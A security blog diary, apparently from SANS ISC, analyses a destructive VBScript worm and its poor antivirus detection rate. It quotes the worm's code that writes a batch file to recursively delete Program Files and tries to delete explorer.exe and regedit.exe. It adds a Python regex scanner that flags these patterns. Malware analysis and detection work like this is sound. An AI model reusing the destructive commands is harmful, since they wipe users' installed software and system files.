SANS ISC: VB detection: is it so difficult? - Internet Security | DShield SANS ISC InfoSec Forums
VB detection: is it so difficult?

One of our readers submitted a malware sample that had recently infected his machine. The sample was a worm written in Visual Basic script, so the analysis was easy.

The worm offered nothing new really – the only thing that surprised me was how destructive it is (today we normally see only sneaky malware that tries to stay on your system as long as possible). Besides setting dozens of registry keys to prevent certain executables from running (anti-virus programs, but also simple programs such as Notepad), it did something really nasty:

set yeah=fso.CreateTextFile("C:\Northstar.bat")
yeah.WriteLine "@echo off"
yeah.WriteLine "cls"
yeah.WriteLine "deltree C:\Program Files\*.*"
yeah.Close

In other words, it tries to delete all the files under the Program Files directory. Besides this, it tries to delete two other files:

Set k = fso.GetFile("c:\windows\explorer.exe")
k.Delete
Set k = fso.GetFile("c:\windows\regedit.exe")
k.Delete

Due to Windows File Protection, these deletions will fail, but we can see that the malware author decided to be very destructive (the worm replicates itself to all available shares and disks before doing this).
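As an added illustration (not part of the original diary, and not the worm's code), here is a small static triage scanner in Python that flags the destructive patterns described above: a FileSystemObject creating a .bat file, a recursive delete aimed at Program Files written into that batch, and a GetFile handle on a Windows system executable followed by a .Delete call on the same variable. The two scripts it runs on are constructed here to mirror the quoted fragments and are never executed; the indicator names and the two-indicator threshold are my own assumptions, and a hit means "pull this file for analysis", not a signature.

```python
import re

# Constructed VBScript fragments used only as scanner input. SAMPLE_VBS mirrors the
# fragments quoted in the diary; it is not the real worm and is never executed.
SAMPLE_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
set yeah=fso.CreateTextFile("C:\Northstar.bat")
yeah.WriteLine "@echo off"
yeah.WriteLine "cls"
yeah.WriteLine "deltree C:\Program Files\*.*"
yeah.Close
Set k = fso.GetFile("c:\windows\explorer.exe")
k.Delete
Set k = fso.GetFile("c:\windows\regedit.exe")
k.Delete
'''

# A harmless script that also uses FileSystemObject, to check for false positives.
BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\logs\report.txt", 1)
WScript.Echo f.ReadAll
f.Close
'''

# Single-line indicators (hypothetical names chosen for this example). Patterns are
# case-insensitive because VBScript identifiers and DOS commands are.
LINE_INDICATORS = [
    # FileSystemObject creating a batch file on disk
    ("drops_batch_file",
     re.compile(r'\.CreateTextFile\s*\(\s*"[^"]*\.bat"', re.I)),
    # a recursive delete command written into that batch file
    ("batch_recursive_delete",
     re.compile(r'\.WriteLine\s+"\s*(?:deltree|rd\s+/s|rmdir\s+/s|del\s+/[sq])\b', re.I)),
    # a written line that names the Program Files tree
    ("targets_program_files",
     re.compile(r'\.WriteLine\s+"[^"]*Program Files', re.I)),
]

# Two-line indicator: a GetFile handle on an executable under \windows\ whose
# variable later receives a .Delete call.
GETFILE_RE = re.compile(
    r'Set\s+(\w+)\s*=\s*\w+\.GetFile\s*\(\s*"([^"]*\\windows\\[^"]*\.exe)"\s*\)', re.I)


def scan_vbs(text):
    """Return the indicators hit and the system executables the script tries to delete."""
    hits = [name for name, pat in LINE_INDICATORS if pat.search(text)]
    targets = []
    for m in GETFILE_RE.finditer(text):
        var, path = m.group(1), m.group(2)
        # Only count it if the same variable is deleted somewhere after the assignment.
        if re.search(r'\b' + re.escape(var) + r'\.Delete\b', text[m.end():], re.I):
            targets.append(path.lower())
    if targets:
        hits.append("deletes_system_executable")
    return {"indicators": hits, "system_exe_targets": targets}


def verdict(report):
    """Crude triage threshold (assumption): two or more indicators means pull the
    file for analysis; one alone is too common in legitimate admin scripts."""
    return "suspicious" if len(report["indicators"]) >= 2 else "clean"


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        report = scan_vbs(script)
        print(label, verdict(report), report)
```

The point of the example is how little is needed to catch a script like this: plain-text VBScript exposes its intent in string literals, so a handful of patterns over the file, with a simple correlation between the GetFile assignment and the later Delete, is enough to separate it from an ordinary administrative script that merely opens and reads a file.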

After playing with it I decided to see what the AV coverage of this (simple) piece of malware was … and the result was shocking. On VirusTotal, only 11 out of 32 AV engines detected it:

Antivirus          Version        Last update   Result
AntiVir            7.6.0.80       2008.04.03    VBS/Zapchast
AVG                7.5.0.516      2008.04.02    VBS/Small
BitDefender        7.2            2008.04.03    Win32.Ariss.A@mm
DrWeb              4.44.0.09170   2008.04.03    modification of VBS.Generic.458
eSafe              7.0.15.0       2008.04.01    VBS.Crystal
F-Secure           6.70.13260.0   2008.04.03    Type_Script
Kaspersky          7.0.0.125      2008.04.03    Type_Script
NOD32v2            2998           2008.04.03    VBS/SysLock.A
Panda              9.0.0.4        2008.04.02    Suspicious file
Rising             20.38.22.00    2008.04.02    Worm.Larisa.a
Webwasher-Gateway  6.6.2          2008.04.03    Script.Soad.2

As you can see, most major anti-virus programs missed this (very simple) piece of malware. We've sent the sample to them, so hopefully they will start detecting it soon, but this is another example of why we must not ignore old(er) technologies that the bad guys still rely on.

--

Bojan
